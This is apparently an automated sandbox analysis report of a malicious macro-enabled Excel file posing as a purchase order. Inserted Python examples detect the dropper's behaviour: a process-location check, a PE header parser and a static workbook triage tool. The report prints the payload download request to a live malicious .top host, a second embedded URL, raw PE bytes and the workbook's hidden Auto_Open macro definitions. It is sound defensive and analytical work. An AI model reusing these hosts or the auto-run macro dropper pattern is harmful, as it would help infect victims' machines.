Analysis Report PURCHASE ORDER No-17-11-98543.xlsm

Overview

General Information

Sample Name: PURCHASE ORDER No-17-11-98543.xlsm
Analysis ID: 319311
MD5: 921ac551fe8d88c2185f39f0e777eabd
SHA1: 40702dc4f773cfa3fcf03c62ec810ba3f5e6b72d
SHA256: b1660b65514182bf97a767caa264b0500ef14692e69dae6ddca344591e7e016d
Tags: xlsm

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to detect sleep reduction / modifications
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: System File Execution Location Anomaly
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Excel document contains an embedded macro which executes code when the document is opened
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: gvbmkhvnyib.top Virustotal: Detection: 6%
Source: http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloader Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\ETTER\dAneDFma\conhost.exe Virustotal: Detection: 29%
Source: C:\ETTER\dAneDFma\conhost.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
Source: PURCHASE ORDER No-17-11-98543.xlsm Virustotal: Detection: 9%
Machine Learning detection for dropped file
Source: C:\ETTER\dAneDFma\conhost.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Joe Sandbox ML: detected
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043FF74 FindFirstFileExW, 3_2_0043FF74
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005501C4 FindFirstFileExW, 3_2_005501C4

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: conhost[1].triumphloader.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\ETTER\dAneDFma\conhost.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 66MB
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: gvbmkhvnyib.top
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
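The "process start blacklist hit" above and the Sigma hit "System File Execution Location Anomaly" in the signature list describe the same event from two angles: EXCEL.EXE started a file named conhost.exe from C:\ETTER\dAneDFma\, whereas the genuine conhost.exe lives in C:\Windows\System32. The following is an added example, not part of this report and not the Sigma rule's own code, of the two checks a detection engineer would run over process-creation telemetry for this: a core system binary name executing outside the Windows system directories, and an Office application as the direct parent of a new process. The events are constructed to mirror the report's process tree; the field names and the binary and directory lists are assumptions made for the example.

```python
import ntpath
from dataclasses import dataclass

# Windows binaries that legitimately run only from the system directories
# (small subset, lower-case, chosen for this example).
SYSTEM_BINARIES = {"conhost.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                   "rundll32.exe", "wininit.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
               "c:\\windows\\winsxs\\")
# Office hosts whose child processes deserve a second look.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the started process
    parent_image: str   # full path of its parent
    command_line: str


def _norm(path):
    return path.replace("/", "\\").lower()


def system_file_location_anomaly(ev):
    """File name is a core system binary but the path is outside the
    Windows system directories (the logic behind the Sigma rule)."""
    image = _norm(ev.image)
    if ntpath.basename(image) not in SYSTEM_BINARIES:
        return False
    return not image.startswith(SYSTEM_DIRS)


def office_spawned_process(ev):
    """An Office application is the direct parent of the new process."""
    return ntpath.basename(_norm(ev.parent_image)) in OFFICE_HOSTS


def evaluate(ev):
    hits = []
    if system_file_location_anomaly(ev):
        hits.append("system_file_execution_location_anomaly")
    if office_spawned_process(ev):
        hits.append("office_application_spawned_process")
    return hits


# Constructed events: the first mirrors the report's process tree, the
# other two are benign controls (real conhost.exe under cmd.exe, a
# control-panel applet started by explorer.exe).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\ETTER\dAneDFma\conhost.exe",
                 r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                 r"C:\ETTER\dAneDFma\conhost.exe"),
    ProcessEvent(r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r"\??\C:\Windows\system32\conhost.exe 0x4"),
    ProcessEvent(r"C:\Windows\SysWOW64\rundll32.exe",
                 r"C:\Windows\explorer.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL"),
]


def scan(events=SAMPLE_EVENTS):
    """Map each image path to the list of detections it triggered."""
    return {ev.image: evaluate(ev) for ev in events}


if __name__ == "__main__":
    for image, hits in scan().items():
        print(f"{image}: {', '.join(hits) or 'no detection'}")
```

Both checks fire on the first event and neither on the controls. In production the location check is keyed on the file name only, so a renamed copy (the report's "drops files with a non-matching file extension" case) is caught by the Office-parent check rather than this one; the two are complementary, not redundant.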

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 06:57:22 GMTContent-Length: 297472Connection: keep-aliveLast-Modified: Wed, 18 Nov 2020 00:57:27 GMTETag: "48a00-5b457185761f5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 13 06 a2 e9 72 68 f1 e9 72 68 f1 e9 72 68 f1 f7 20 ec f1 cf 72 68 f1 f7 20 fd f1 fa 72 68 f1 f7 20 eb f1 98 72 68 f1 ce b4 13 f1 ec 72 68 f1 e9 72 69 f1 9b 72 68 f1 f7 20 e2 f1 e8 72 68 f1 f7 20 fc f1 e8 72 68 f1 f7 20 f9 f1 e8 72 68 f1 52 69 63 68 e9 72 68 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 1b 50 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 b2 05 00 00 00 00 00 b9 15 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 0a 00 00 04 00 00 d1 b0 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 59 04 00 3c 00 00 00 00 d0 09 00 c0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 55 04 00 18 00 00 00 e8 54 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 55 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 30 22 00 00 00 40 04 00 00 24 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 4a 05 00 00 70 04 00 00 14 00 00 00 4c 
04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 c0 09 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 26 00 00 00 d0 09 00 00 28 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: IQHOSTRU IQHOSTRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71A94C24.png
Source: unknown DNS traffic detected: queries for: gvbmkhvnyib.top
Source: conhost.exe String found in binary or memory: http://4cnx9s25gsvw.top/syZsNnTNps.vx
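Three signatures in this report ("Downloads executable code via HTTP", "Drops files with a non-matching file extension" and "Document exploit detected (UrlDownloadToFile)") rest on one observation: the body returned for /QtuFGobZaW/conhost.triumphloader begins with an MZ/PE header although nothing in the URL says executable, and EXCEL.EXE then wrote it to disk as conhost.exe. The following is an added example, not part of the Joe Sandbox report, of how a proxy or sandbox makes that determination from the first few hundred bytes of the response. The sample buffer is the first 0x120 bytes of the "Data Raw" capture above, transcribed from the report; the offsets follow the standard PE/COFF layout (e_lfanew at 0x3C, a 20-byte COFF file header, then the optional header), the set of executable extensions is an assumption, and the section table, which lies beyond the excerpt, is not parsed.

```python
import posixpath
import struct
from datetime import datetime, timezone
from urllib.parse import urlsplit

EXECUTABLE_EXTENSIONS = {"exe", "dll", "sys", "scr", "cpl", "ocx", "drv"}
MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C4: "ARM-Thumb2", 0xAA64: "ARM64"}

# First 0x120 bytes of the HTTP response body from the report's "Data Raw"
# capture (transcribed): DOS header, DOS stub, Rich header, PE signature,
# COFF file header and the first 32 bytes of the PE32 optional header.
RESPONSE_HEAD = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"  # 0x000 "MZ" ...
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "000000000000000000000000e8000000"  # 0x03c e_lfanew = 0xe8
    "0e1fba0e00b409cd21b8014ccd215468"  # 0x040 DOS stub ("This program cannot ...")
    "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320"
    "6d6f64652e0d0d0a2400000000000000"
    "ad1306a2e97268f1e97268f1e97268f1"  # 0x080 Rich header (XOR-masked)
    "f720ecf1cf7268f1f720fdf1fa7268f1"
    "f720ebf1987268f1ceb413f1ec7268f1"
    "e97269f19b7268f1f720e2f1e87268f1"
    "f720fcf1e87268f1f720f9f1e87268f1"
    "52696368e97268f10000000000000000"  # 0x0d0 "Rich" marker + mask
    "0000000000000000504500004c010500"  # 0x0e8 "PE\0\0", Machine, NumberOfSections
    "071b505e0000000000000000e0000301"  # 0x0f0 TimeDateStamp ... Characteristics
    "0b0109000024040000b2050000000000"  # 0x100 optional header, Magic 0x10b (PE32)
    "b9150000001000000040040000004000"  # 0x110 AddressOfEntryPoint ... ImageBase
)
SAMPLE_URL = "http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloader"


def url_extension(url):
    return posixpath.splitext(urlsplit(url).path)[1].lstrip(".").lower()


def parse_pe_head(body):
    """Return the COFF/optional-header facts if `body` starts a PE image,
    else raise ValueError. Only the fixed-size leading fields are read."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    if len(body) < e_lfanew + 24 + 32:
        raise ValueError("truncated PE header")
    machine, nsections, timestamp, _symptr, _nsyms, _optsize, chars = \
        struct.unpack_from("<HHIIIHH", body, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", body, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic %#x" % magic)
    entry = struct.unpack_from("<I", body, opt + 16)[0]
    if magic == 0x10B:                       # PE32: ImageBase is 4 bytes at +28
        image_base = struct.unpack_from("<I", body, opt + 28)[0]
    else:                                    # PE32+: 8 bytes at +24
        image_base = struct.unpack_from("<Q", body, opt + 24)[0]
    return {
        "machine": machine,
        "arch": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "pe32plus": magic == 0x20B,
        "entry_rva": entry,
        "image_base": image_base,
        "is_dll": bool(chars & 0x2000),
    }


def is_pe(body):
    try:
        parse_pe_head(body)
        return True
    except ValueError:
        return False


def triage_download(url, body):
    """Combine the header facts with the URL's claimed type."""
    facts = parse_pe_head(body)
    ext = url_extension(url)
    facts["url_extension"] = ext
    facts["extension_mismatch"] = ext not in EXECUTABLE_EXTENSIONS
    return facts


if __name__ == "__main__":
    for k, v in triage_download(SAMPLE_URL, RESPONSE_HEAD).items():
        print(f"{k:>19}: {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k:>19}: {v}")
```

On the captured bytes this yields an i386 PE32 with five sections (which matches the .text, .rdata, .data, .tls and .rsrc names visible later in the hex), a link timestamp in February 2020, entry point RVA 0x15B9 at image base 0x400000, and a URL extension (.triumphloader) that is not an executable one. The Content-Length of 297472 is 0x48a00, the first field of the ETag, so the whole file, not a fragment, was served.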

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: Enable Content X A' - (" & " A A B C D E F G H I J K L M N O P Q R S : 1 : 4 5 6 C : con
Source: Screenshot number: 12 Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S 1=1 ' 301 302 303 30
Found abnormal large hidden Excel 4.0 Macro sheet
Source: PURCHASE ORDER No-17-11-98543.xlsm Initial sample: Sheet size: 137151
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\ETTER\dAneDFma\conhost.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\ETTER\dAneDFma\conhost.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00409B83 NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory, 3_2_00409B83
Detected potential crypto function
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0041148C 3_2_0041148C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043A17C 3_2_0043A17C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004421A5 3_2_004421A5
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434501 3_2_00434501
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040E599 3_2_0040E599
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043E6A9 3_2_0043E6A9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434735 3_2_00434735
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00444797 3_2_00444797
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00428808 3_2_00428808
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434969 3_2_00434969
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042AAC4 3_2_0042AAC4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434BD0 3_2_00434BD0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00430C60 3_2_00430C60
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042EC6A 3_2_0042EC6A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042AE36 3_2_0042AE36
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B0E0 3_2_0042B0E0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B3A7 3_2_0042B3A7
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B662 3_2_0042B662
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042BA70 3_2_0042BA70
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00439C4D 3_2_00439C4D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00439D71 3_2_00439D71
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054A3CC 3_2_0054A3CC
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005523F5 3_2_005523F5
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544751 3_2_00544751
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544985 3_2_00544985
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00538A58 3_2_00538A58
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544BB9 3_2_00544BB9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0053AD14 3_2_0053AD14
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544E20 3_2_00544E20
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00540EB0 3_2_00540EB0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0053EEBA 3_2_0053EEBA
Excel document contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: " defaultThemeVersion="124226"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="23040" windowHeight="9195"/></bookViews><sheets><sheet name="DocuSign" sheetId="20" r:id="rId1"/><sheet name="ProtectList1" sheetId="21" r:id="rId2"/><sheet name="ProtectList2" sheetId="19" r:id="rId3"/><sheet name="ProtectList3" sheetId="22" r:id="rId4"/></sheets><definedNames><definedName name="Dires" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="dontdoit" function="1" xlm="1">-676986879</definedName><definedName name="Dtruh" function="1" xlm="1" functionGroupId="9">-712638463</definedName><definedName name="okwell" function="1" xlm="1">124715010</definedName><definedName name="plzno" function="1" xlm="1">-709623808</definedName><definedName name="Trolase" function="1" xlm="1" functionGroupId="9">-1602945022</definedName><definedName name="_xlnm.Auto_Open">ProtectList2!$A$1</definedName></definedNames><calcPr calcId="152511"/></workbook>
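The workbook.xml fragment above is what makes this an auto-running Excel 4.0 (XLM) macro document rather than a VBA one: six definedName entries carry xlm="1" and function="1" (names defined on a macro sheet), and _xlnm.Auto_Open points at ProtectList2!$A$1, so Excel starts executing from that cell as soon as the user clicks Enable Content. The "abnormal large hidden Excel 4.0 Macro sheet" signature refers to the same sheet. The following is an added example, not part of the report, of a static triage that extracts exactly these indicators from an .xlsm without opening it in Excel: it parses xl/workbook.xml and xl/_rels/workbook.xml.rels, maps each sheet to its part type, and reports auto-run names, XLM defined names, and macro sheets that are hidden. The sample package is constructed: its workbook.xml reproduces the sheets and definedNames from the fragment (the root element and namespace declarations, cut off in the fragment, are standard OOXML boilerplate), the .rels part is invented so that rId3 resolves to a macro-sheet part, and state="veryHidden" on ProtectList2 is an assumption added so that the visibility check is exercised; the fragment itself shows no state attribute.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_WORKSHEET = NS_R + "/worksheet"
REL_MACROSHEET = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"
AUTO_NAMES = {"_xlnm.auto_open", "_xlnm.auto_close", "auto_open", "auto_close"}

# xl/workbook.xml rebuilt from the fragment in the report. Root element and
# namespaces are OOXML boilerplate; state="veryHidden" on ProtectList2 is an
# ASSUMPTION for the example (the fragment shows no state attribute).
WORKBOOK_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_R}">'
    '<fileVersion appName="xl" defaultThemeVersion="124226"/>'
    '<bookViews><workbookView xWindow="0" yWindow="0" windowWidth="23040" windowHeight="9195"/></bookViews>'
    '<sheets>'
    '<sheet name="DocuSign" sheetId="20" r:id="rId1"/>'
    '<sheet name="ProtectList1" sheetId="21" r:id="rId2"/>'
    '<sheet name="ProtectList2" sheetId="19" state="veryHidden" r:id="rId3"/>'
    '<sheet name="ProtectList3" sheetId="22" r:id="rId4"/>'
    '</sheets><definedNames>'
    '<definedName name="Dires" function="1" xlm="1" functionGroupId="9">-709623808</definedName>'
    '<definedName name="dontdoit" function="1" xlm="1">-676986879</definedName>'
    '<definedName name="Dtruh" function="1" xlm="1" functionGroupId="9">-712638463</definedName>'
    '<definedName name="okwell" function="1" xlm="1">124715010</definedName>'
    '<definedName name="plzno" function="1" xlm="1">-709623808</definedName>'
    '<definedName name="Trolase" function="1" xlm="1" functionGroupId="9">-1602945022</definedName>'
    '<definedName name="_xlnm.Auto_Open">ProtectList2!$A$1</definedName>'
    '</definedNames><calcPr calcId="152511"/></workbook>'
)

# xl/_rels/workbook.xml.rels is constructed (the report does not show it):
# rId3 resolves to a macro-sheet part, the others to ordinary worksheets.
WORKBOOK_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{NS_PKG}">'
    f'<Relationship Id="rId1" Type="{REL_WORKSHEET}" Target="worksheets/sheet1.xml"/>'
    f'<Relationship Id="rId2" Type="{REL_WORKSHEET}" Target="worksheets/sheet2.xml"/>'
    f'<Relationship Id="rId3" Type="{REL_MACROSHEET}" Target="macrosheets/sheet1.xml"/>'
    f'<Relationship Id="rId4" Type="{REL_WORKSHEET}" Target="worksheets/sheet3.xml"/>'
    '</Relationships>'
)


def build_sample():
    """Minimal OOXML package containing just the two parts the check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", WORKBOOK_XML)
        z.writestr("xl/_rels/workbook.xml.rels", WORKBOOK_RELS)
    return buf.getvalue()


def triage_workbook(blob):
    """Static XLM indicators from an .xlsx/.xlsm byte string."""
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
    rel_type = {r.get("Id"): r.get("Type")
                for r in rels.iter(f"{{{NS_PKG}}}Relationship")}
    sheets = {}
    for s in wb.iter(f"{{{NS_MAIN}}}sheet"):
        sheets[s.get("name")] = {
            "state": s.get("state", "visible"),
            "macrosheet": rel_type.get(s.get(f"{{{NS_R}}}id")) == REL_MACROSHEET,
        }
    auto_open, xlm_names = [], []
    for d in wb.iter(f"{{{NS_MAIN}}}definedName"):
        name = d.get("name", "")
        target = (d.text or "").strip()
        if name.lower() in AUTO_NAMES:
            auto_open.append((name, target))
        if d.get("xlm") == "1":
            xlm_names.append(name)
    hidden_macrosheets = [n for n, s in sheets.items()
                          if s["macrosheet"] and s["state"] != "visible"]
    # An auto-run name is a real trigger when it lands on a macro sheet.
    triggers = [t for _, t in auto_open
                if sheets.get(t.split("!")[0].strip("'"), {}).get("macrosheet")]
    return {
        "sheets": sheets,
        "auto_open": auto_open,
        "xlm_defined_names": xlm_names,
        "hidden_macrosheets": hidden_macrosheets,
        "xlm_auto_run_triggers": triggers,
        "suspicious": bool(triggers or (auto_open and xlm_names)),
    }


if __name__ == "__main__":
    for k, v in triage_workbook(build_sample()).items():
        print(f"{k}: {v}")
```

On a real sample, pass the file's bytes to triage_workbook() directly. Excel also honours Auto_Open without the _xlnm. prefix and Auto_Close, which AUTO_NAMES covers; an auto-run name that resolves to an ordinary worksheet is reported but not counted as a trigger.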
Found potential string decryption / allocating functions
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00428DB0 appears 62 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00523144 appears 304 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00539000 appears 51 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 004326F9 appears 149 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00429D60 appears 43 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00412EF4 appears 350 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00539FB0 appears 39 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 0042962A appears 34 times
Yara signature match
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168715128.0000000000510000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168603978.00000000002F8000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
